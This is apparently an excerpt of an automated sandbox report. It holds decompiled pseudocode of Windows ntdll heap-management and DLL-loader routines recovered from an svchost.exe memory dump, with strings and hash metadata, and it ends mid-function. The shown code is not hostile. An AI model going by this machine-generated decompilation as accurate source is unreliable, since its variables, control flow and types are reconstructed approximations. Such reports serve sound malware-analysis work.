                        • Opcode Fuzzy Hash: dfd09d35d32deed8f9ec286a2253d2a85b5f6706f8a7704868508860fa040669
                        • Instruction Fuzzy Hash: FCF16CB6D02219EFCB11DF99C980AEEBBFDFF49650F14446AE505AB250D7749E00CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 29%
                        			E030240E1(void* __edx) {
                        				void* _t19;
                        				void* _t29;
                        
                        				_t28 = _t19;
                        				_t29 = __edx;
                        				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push("HEAP: ");
                        						E0302B150();
                        					} else {
                        						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E0302B150("Invalid heap signature for heap at %p", _t28);
                        					if(_t29 != 0) {
                        						E0302B150(", passed to %s", _t29);
                        					}
                        					_push("\n");
                        					E0302B150();
                        					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                        						 *0x3116378 = 1;
                        						asm("int3");
                        						 *0x3116378 = 0;
                        					}
                        					return 0;
                        				}
                        				return 1;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                        • API String ID: 0-188067316
                        • Opcode ID: 9a464d669748bbd484abc4a5b3ab564d1381b6152d70ff84e3fe723ea6c100d9
                        • Instruction ID: 49f19fb4f3babfad79798a90373079b45fb0f6bd65ea53a6ca548edafd5ac36a
                        • Opcode Fuzzy Hash: 9a464d669748bbd484abc4a5b3ab564d1381b6152d70ff84e3fe723ea6c100d9
                        • Instruction Fuzzy Hash: 87014076153754AEE239F768D40DFD67BE4DB81B30F194069F0094FA81CAA554C4C720
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E0304A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                        				void* _v5;
                        				signed short _v12;
                        				intOrPtr _v16;
                        				signed int _v20;
                        				signed short _v24;
                        				signed short _v28;
                        				signed int _v32;
                        				signed short _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				signed short* _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __ebp;
                        				signed int _t131;
                        				signed char _t134;
                        				signed int _t138;
                        				char _t141;
                        				signed short _t142;
                        				void* _t146;
                        				signed short _t147;
                        				intOrPtr* _t149;
                        				intOrPtr _t156;
                        				signed int _t167;
                        				signed int _t168;
                        				signed short* _t173;
                        				signed short _t174;
                        				intOrPtr* _t182;
                        				signed short _t184;
                        				intOrPtr* _t187;
                        				intOrPtr _t197;
                        				intOrPtr _t206;
                        				intOrPtr _t210;
                        				signed short _t211;
                        				intOrPtr* _t212;
                        				signed short _t214;
                        				signed int _t216;
                        				intOrPtr _t217;
                        				signed char _t225;
                        				signed short _t235;
                        				signed int _t237;
                        				intOrPtr* _t238;
                        				signed int _t242;
                        				unsigned int _t245;
                        				signed int _t251;
                        				intOrPtr* _t252;
                        				signed int _t253;
                        				intOrPtr* _t255;
                        				signed int _t256;
                        				void* _t257;
                        				void* _t260;
                        
                        				_t256 = __edx;
                        				_t206 = __ecx;
                        				_t235 = _a4;
                        				_v44 = __ecx;
                        				_v24 = _t235;
                        				if(_t235 == 0) {
                        					L41:
                        					return _t131;
                        				}
                        				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                        				if(_t251 == 0) {
                        					__eflags =  *0x3118748 - 1;
                        					if( *0x3118748 >= 1) {
                        						__eflags =  *(__edx + 2) & 0x00000008;
                        						if(( *(__edx + 2) & 0x00000008) == 0) {
                        							_t110 = _t256 + 0xfff; // 0xfe7
                        							__eflags = (_t110 & 0xfffff000) - __edx;
                        							if((_t110 & 0xfffff000) != __edx) {
                        								_t197 =  *[fs:0x30];
                        								__eflags =  *(_t197 + 0xc);
                        								if( *(_t197 + 0xc) == 0) {
                        									_push("HEAP: ");
                        									E0302B150();
                        									_t260 = _t257 + 4;
                        								} else {
                        									E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        									_t260 = _t257 + 8;
                        								}
                        								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                        								E0302B150();
                        								_t257 = _t260 + 4;
                        								__eflags =  *0x3117bc8;
                        								if(__eflags == 0) {
                        									E030E2073(_t206, 1, _t251, __eflags);
                        								}
                        								_t235 = _v24;
                        							}
                        						}
                        					}
                        				}
                        				_t134 =  *((intOrPtr*)(_t256 + 6));
                        				if(_t134 == 0) {
                        					_t210 = _t206;
                        					_v48 = _t206;
                        				} else {
                        					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                        					_v48 = _t210;
                        				}
                        				_v5 =  *(_t256 + 2);
                        				do {
                        					if(_t235 > 0xfe00) {
                        						_v12 = 0xfe00;
                        						__eflags = _t235 - 0xfe01;
                        						if(_t235 == 0xfe01) {
                        							_v12 = 0xfdf0;
                        						}
                        						_t138 = 0;
                        					} else {
                        						_v12 = _t235 & 0x0000ffff;
                        						_t138 = _v5;
                        					}
                        					 *(_t256 + 2) = _t138;
                        					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                        					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                        					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                        						_t141 = 0;
                        					} else {
                        						_t141 = (_t256 - _t210 >> 0x10) + 1;
                        						_v40 = _t141;
                        						if(_t141 >= 0xfe) {
                        							_push(_t210);
                        							E030EA80D(_t236, _t256, _t210, 0);
                        							_t141 = _v40;
                        						}
                        					}
                        					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                        					 *((char*)(_t256 + 6)) = _t141;
                        					_t142 = _v12;
                        					 *_t256 = _t142;
                        					 *(_t256 + 3) = 0;
                        					_t211 = _t142 & 0x0000ffff;
                        					 *((char*)(_t256 + 7)) = 0;
                        					_v20 = _t211;
                        					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                        						_t119 = _t256 + 0x10; // -8
                        						E0307D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                        						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                        						_t211 = _v20;
                        					}
                        					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                        					if(_t252 == 0) {
                        						L56:
                        						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                        						_t146 = _t206 + 0xc0;
                        						goto L19;
                        					} else {
                        						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                        							L15:
                        							_t185 = _t211;
                        							goto L17;
                        						} else {
                        							while(1) {
                        								_t187 =  *_t252;
                        								if(_t187 == 0) {
                        									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                        									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                        									goto L17;
                        								}
                        								_t252 = _t187;
                        								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                        									continue;
                        								}
                        								goto L15;
                        							}
                        							while(1) {
                        								L17:
                        								_t212 = E0304AB40(_t206, _t252, 1, _t185, _t211);
                        								if(_t212 != 0) {
                        									_t146 = _t206 + 0xc0;
                        									break;
                        								}
                        								_t252 =  *_t252;
                        								_t211 = _v20;
                        								_t185 =  *(_t252 + 0x14);
                        							}
                        							L19:
                        							if(_t146 != _t212) {
                        								_t237 =  *(_t206 + 0x4c);
                        								_t253 = _v20;
                        								while(1) {
                        									__eflags = _t237;
                        									if(_t237 == 0) {
                        										_t147 =  *(_t212 - 8) & 0x0000ffff;
                        									} else {
                        										_t184 =  *(_t212 - 8);
                        										_t237 =  *(_t206 + 0x4c);
                        										__eflags = _t184 & _t237;
                        										if((_t184 & _t237) != 0) {
                        											_t184 = _t184 ^  *(_t206 + 0x50);
                        											__eflags = _t184;
                        										}
                        										_t147 = _t184 & 0x0000ffff;
                        									}
                        									__eflags = _t253 - (_t147 & 0x0000ffff);
                        									if(_t253 <= (_t147 & 0x0000ffff)) {
                        										goto L20;
                        									}
                        									_t212 =  *_t212;
                        									__eflags = _t206 + 0xc0 - _t212;
                        									if(_t206 + 0xc0 != _t212) {
                        										continue;
                        									} else {
                        										goto L20;
                        									}
                        									goto L56;
                        								}
                        							}
                        							L20:
                        							_t149 =  *((intOrPtr*)(_t212 + 4));
                        							_t33 = _t256 + 8; // -16
                        							_t238 = _t33;
                        							_t254 =  *_t149;
                        							if( *_t149 != _t212) {
                        								_push(_t212);
                        								E030EA80D(0, _t212, 0, _t254);
                        							} else {
                        								 *_t238 = _t212;
                        								 *((intOrPtr*)(_t238 + 4)) = _t149;
                        								 *_t149 = _t238;
                        								 *((intOrPtr*)(_t212 + 4)) = _t238;
                        							}
                        							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                        							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                        							if(_t255 == 0) {
                        								L36:
                        								if( *(_t206 + 0x4c) != 0) {
                        									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                        									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                        								}
                        								_t210 = _v48;
                        								_t251 = _v12 & 0x0000ffff;
                        								_t131 = _v20;
                        								_t235 = _v24 - _t131;
                        								_v24 = _t235;
                        								_t256 = _t256 + _t131 * 8;
                        								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                        									goto L41;
                        								} else {
                        									goto L39;
                        								}
                        							} else {
                        								_t216 =  *_t256 & 0x0000ffff;
                        								_v28 = _t216;
                        								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                        									L28:
                        									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                        									_v32 = _t242;
                        									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                        										_t167 = _t242 + _t242;
                        									} else {
                        										_t167 = _t242;
                        									}
                        									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                        									_t168 = _t167 << 2;
                        									_v40 = _t168;
                        									_t206 = _v44;
                        									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                        									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                        										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                        									}
                        									_t217 = _v16;
                        									if(_t217 != 0) {
                        										_t173 = _t217 - 8;
                        										_v52 = _t173;
                        										_t174 =  *_t173;
                        										__eflags =  *(_t206 + 0x4c);
                        										if( *(_t206 + 0x4c) != 0) {
                        											_t245 =  *(_t206 + 0x50) ^ _t174;
                        											_v36 = _t245;
                        											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                        											__eflags = _t245 >> 0x18 - _t225;
                        											if(_t245 >> 0x18 != _t225) {
                        												_push(_t225);
                        												E030EA80D(_t206, _v52, 0, 0);
                        											}
                        											_t174 = _v36;
                        											_t217 = _v16;
                        											_t242 = _v32;
                        										}
                        										_v28 = _v28 - (_t174 & 0x0000ffff);
                        										__eflags = _v28;
                        										if(_v28 > 0) {
                        											goto L34;
                        										} else {
                        											goto L33;
                        										}
                        									} else {
                        										L33:
                        										_t58 = _t256 + 8; // -16
                        										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                        										_t206 = _v44;
                        										_t217 = _v16;
                        										L34:
                        										if(_t217 == 0) {
                        											asm("bts eax, edx");
                        										}
                        										goto L36;
                        									}
                        								} else {
                        									goto L24;
                        								}
                        								while(1) {
                        									L24:
                        									_t182 =  *_t255;
                        									if(_t182 == 0) {
                        										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                        										__eflags = _t216;
                        										goto L28;
                        									}
                        									_t255 = _t182;
                        									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                        										continue;
                        									} else {
                        										goto L28;
                        									}
                        								}
                        								goto L28;
                        							}
                        						}
                        					}
                        					L39:
                        				} while (_t235 != 0);
                        				_t214 = _v12;
                        				_t131 =  *(_t206 + 0x54) ^ _t214;
                        				 *(_t256 + 4) = _t131;
                        				if(_t214 == 0) {
                        					__eflags =  *0x3118748 - 1;
                        					if( *0x3118748 >= 1) {
                        						_t127 = _t256 + 0xfff; // 0xfff
                        						_t131 = _t127 & 0xfffff000;
                        						__eflags = _t131 - _t256;
                        						if(_t131 != _t256) {
                        							_t156 =  *[fs:0x30];
                        							__eflags =  *(_t156 + 0xc);
                        							if( *(_t156 + 0xc) == 0) {
                        								_push("HEAP: ");
                        								E0302B150();
                        							} else {
                        								E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        							}
                        							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                        							_t131 = E0302B150();
                        							__eflags =  *0x3117bc8;
                        							if(__eflags == 0) {
                        								_t131 = E030E2073(_t206, 1, _t251, __eflags);
                        							}
                        						}
                        					}
                        				}
                        				goto L41;
                        			}

                        Strings
                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 030922F3
                        • HEAP: , xrefs: 030922E6, 030923F6
                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03092403
                        • HEAP[%wZ]: , xrefs: 030922D7, 030923E7
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                        • API String ID: 0-1657114761
                        • Opcode ID: af0677a26c0b22b13cf56e4231b56abfa93b1e24aaa351357b7b581841f035a7
                        • Instruction ID: 76e3b7e1864b39302a68f958446e1958ee95eafede377942337f01f25ed6aa79
                        • Opcode Fuzzy Hash: af0677a26c0b22b13cf56e4231b56abfa93b1e24aaa351357b7b581841f035a7
                        • Instruction Fuzzy Hash: B0D1BEB4B422459FDB18CF68C590BAAB7F5FF88300F198979D8569B742E330EA45CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E0304A229(void* __ecx, void* __edx) {
                        				signed int _v20;
                        				char _v24;
                        				char _v28;
                        				void* _v44;
                        				void* _v48;
                        				void* _v56;
                        				void* _v60;
                        				void* __ebx;
                        				signed int _t55;
                        				signed int _t57;
                        				void* _t61;
                        				intOrPtr _t62;
                        				void* _t65;
                        				void* _t71;
                        				signed char* _t74;
                        				intOrPtr _t75;
                        				signed char* _t80;
                        				intOrPtr _t81;
                        				void* _t82;
                        				signed char* _t85;
                        				signed char _t91;
                        				void* _t103;
                        				void* _t105;
                        				void* _t121;
                        				void* _t129;
                        				signed int _t131;
                        				void* _t133;
                        
                        				_t105 = __ecx;
                        				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                        				_t103 = __edx;
                        				_t129 = __ecx;
                        				E0304DF24(__edx,  &_v28, _t133);
                        				_t55 =  *(_t129 + 0x40) & 0x00040000;
                        				asm("sbb edi, edi");
                        				_t121 = ( ~_t55 & 0x0000003c) + 4;
                        				if(_t55 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t129);
                        					_push(0xffffffff);
                        					_t57 = E03069730();
                        					__eflags = _t57;
                        					if(_t57 < 0) {
                        						L17:
                        						_push(_t105);
                        						E030EA80D(_t129, 1, _v20, 0);
                        						_t121 = 4;
                        						goto L1;
                        					}
                        					__eflags = _v20 & 0x00000060;
                        					if((_v20 & 0x00000060) == 0) {
                        						goto L17;
                        					}
                        					__eflags = _v24 - _t129;
                        					if(_v24 == _t129) {
                        						goto L1;
                        					}
                        					goto L17;
                        				}
                        				L1:
                        				_push(_t121);
                        				_push(0x1000);
                        				_push(_t133 + 0x14);
                        				_push(0);
                        				_push(_t133 + 0x20);
                        				_push(0xffffffff);
                        				_t61 = E03069660();
                        				_t122 = _t61;
                        				if(_t61 < 0) {
                        					_t62 =  *[fs:0x30];
                        					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                        					__eflags =  *(_t62 + 0xc);
                        					if( *(_t62 + 0xc) == 0) {
                        						_push("HEAP: ");
                        						E0302B150();
                        					} else {
                        						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					_push( *((intOrPtr*)(_t133 + 0xc)));
                        					_push( *((intOrPtr*)(_t133 + 0x14)));
                        					_push(_t129);
                        					E0302B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                        					_t65 = 0;
                        					L13:
                        					return _t65;
                        				}
                        				_t71 = E03047D50();
                        				_t124 = 0x7ffe0380;
                        				if(_t71 != 0) {
                        					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				} else {
                        					_t74 = 0x7ffe0380;
                        				}
                        				if( *_t74 != 0) {
                        					_t75 =  *[fs:0x30];
                        					__eflags =  *(_t75 + 0x240) & 0x00000001;
                        					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                        						E030E138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                        					}
                        				}
                        				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                        				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                        				if(E03047D50() != 0) {
                        					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				} else {
                        					_t80 = _t124;
                        				}
                        				if( *_t80 != 0) {
                        					_t81 =  *[fs:0x30];
                        					__eflags =  *(_t81 + 0x240) & 0x00000001;
                        					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                        						__eflags = E03047D50();
                        						if(__eflags != 0) {
                        							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        						}
                        						E030E1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                        					}
                        				}
                        				_t82 = E03047D50();
                        				_t125 = 0x7ffe038a;
                        				if(_t82 != 0) {
                        					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        				} else {
                        					_t85 = 0x7ffe038a;
                        				}
                        				if( *_t85 != 0) {
                        					__eflags = E03047D50();
                        					if(__eflags != 0) {
                        						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        					}
                        					E030E1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                        				}
                        				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                        				_t91 =  *(_t103 + 2);
                        				if((_t91 & 0x00000004) != 0) {
                        					E0307D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                        					_t91 =  *(_t103 + 2);
                        				}
                        				 *(_t103 + 2) = _t91 & 0x00000017;
                        				_t65 = 1;
                        				goto L13;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                        • API String ID: 2994545307-2586055223
                        • Opcode ID: 9b869449473275f07559ed2d075e68c448b5d6d028ca6901558ad13069073f6f
                        • Instruction ID: fe2c3eee67797bf72f8ea3edef82abb6e99eab9eb08e25fe88bbeb99d97bea2f
                        • Opcode Fuzzy Hash: 9b869449473275f07559ed2d075e68c448b5d6d028ca6901558ad13069073f6f
                        • Instruction Fuzzy Hash: 6F5134B2307781AFE726DB68C944F6BB7E8EF84B50F080865F4618B291D734D900DB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E03058E00(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t43;
                        				void* _t46;
                        				intOrPtr _t47;
                        				void* _t48;
                        				signed int _t49;
                        				void* _t50;
                        				intOrPtr* _t51;
                        				signed int _t52;
                        				void* _t53;
                        				intOrPtr _t55;
                        
                        				_v8 =  *0x311d360 ^ _t52;
                        				_t49 = 0;
                        				_t48 = __ecx;
                        				_t55 =  *0x3118464; // 0x76c90110
                        				if(_t55 == 0) {
                        					L9:
                        					if( !_t49 >= 0) {
                        						if(( *0x3115780 & 0x00000003) != 0) {
                        							E030A5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                        						}
                        						if(( *0x3115780 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        					}
                        					return E0306B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                        				}
                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                        				_t43 =  *0x3117984; // 0x2803540
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                        					if(_t48 == _t43) {
                        						_t50 = 0x5c;
                        						if( *_t32 == _t50) {
                        							_t46 = 0x3f;
                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                        								_t32 = _t32 + 8;
                        							}
                        						}
                        					}
                        					_t51 =  *0x3118464; // 0x76c90110
                        					 *0x311b1e0(_t47, _t32,  &_v12);
                        					_t49 =  *_t51();
                        					if(_t49 >= 0) {
                        						L8:
                        						_t35 = _v12;
                        						if(_t35 != 0) {
                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                        								E03059B10( *((intOrPtr*)(_t48 + 0x48)));
                        								_t35 = _v12;
                        							}
                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                        						}
                        						goto L9;
                        					}
                        					if(_t49 != 0xc000008a) {
                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                        							if(_t49 != 0xc00000bb) {
                        								goto L8;
                        							}
                        						}
                        					}
                        					if(( *0x3115780 & 0x00000005) != 0) {
                        						_push(_t49);
                        						E030A5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                        						_t53 = _t53 + 0x1c;
                        					}
                        					_t49 = 0;
                        					goto L8;
                        				} else {
                        					goto L9;
                        				}
                        			}

                        Strings
                        • LdrpFindDllActivationContext, xrefs: 03099331, 0309935D
                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0309932A
                        • minkernel\ntdll\ldrsnap.c, xrefs: 0309933B, 03099367
                        • Querying the active activation context failed with status 0x%08lx, xrefs: 03099357
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-3779518884
                        • Opcode ID: 4316438b663870133de754912fbea73a4f339b32c0f8212a3c1327b598394a15
                        • Instruction ID: e170f0cbed1663a62f797bf6bf4b8294d3719a7af3a17e8ff2cacd7224eab805
                        • Opcode Fuzzy Hash: 4316438b663870133de754912fbea73a4f339b32c0f8212a3c1327b598394a15
                        • Instruction Fuzzy Hash: 83410A32B833159FEFA5EA549849B7BB2F9A745204F0DC569FC145B191E7605C808293
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                        • API String ID: 2994545307-336120773
                        • Opcode ID: 6cd4a71b290f7709ebd0347988852843e63d2ae5277b3157d7384a2a71a3b061
                        • Instruction ID: 75154e45eb55e35d425b224f0c8eab36baff971dcd3ff5d231befafa0317afd4
                        • Opcode Fuzzy Hash: 6cd4a71b290f7709ebd0347988852843e63d2ae5277b3157d7384a2a71a3b061
                        • Instruction Fuzzy Hash: 0D310539303214EFD365DB99C886FAAB3E9EF44630F1C4565F4159F281D671E880CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E030499BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                        				char _v5;
                        				signed int _v12;
                        				signed int _v16;
                        				signed short _v20;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed short _t186;
                        				intOrPtr _t187;
                        				signed short _t190;
                        				signed int _t196;
                        				signed short _t197;
                        				intOrPtr _t203;
                        				signed int _t207;
                        				signed int _t210;
                        				signed short _t215;
                        				intOrPtr _t216;
                        				signed short _t219;
                        				signed int _t221;
                        				signed short _t222;
                        				intOrPtr _t228;
                        				signed int _t232;
                        				signed int _t235;
                        				signed int _t250;
                        				signed short _t251;
                        				intOrPtr _t252;
                        				signed short _t254;
                        				intOrPtr _t255;
                        				signed int _t258;
                        				signed int _t259;
                        				signed short _t262;
                        				intOrPtr _t271;
                        				signed int _t279;
                        				signed int _t282;
                        				signed int _t284;
                        				signed int _t286;
                        				intOrPtr _t292;
                        				signed int _t296;
                        				signed int _t299;
                        				signed int _t307;
                        				signed int* _t309;
                        				signed short* _t311;
                        				signed short* _t313;
                        				signed char _t314;
                        				intOrPtr _t316;
                        				signed int _t323;
                        				signed char _t328;
                        				signed short* _t330;
                        				signed char _t331;
                        				intOrPtr _t335;
                        				signed int _t342;
                        				signed char _t347;
                        				signed short* _t348;
                        				signed short* _t350;
                        				signed short _t352;
                        				signed char _t354;
                        				intOrPtr _t357;
                        				intOrPtr* _t364;
                        				signed char _t365;
                        				intOrPtr _t366;
                        				signed int _t373;
                        				signed char _t378;
                        				signed int* _t381;
                        				signed int _t382;
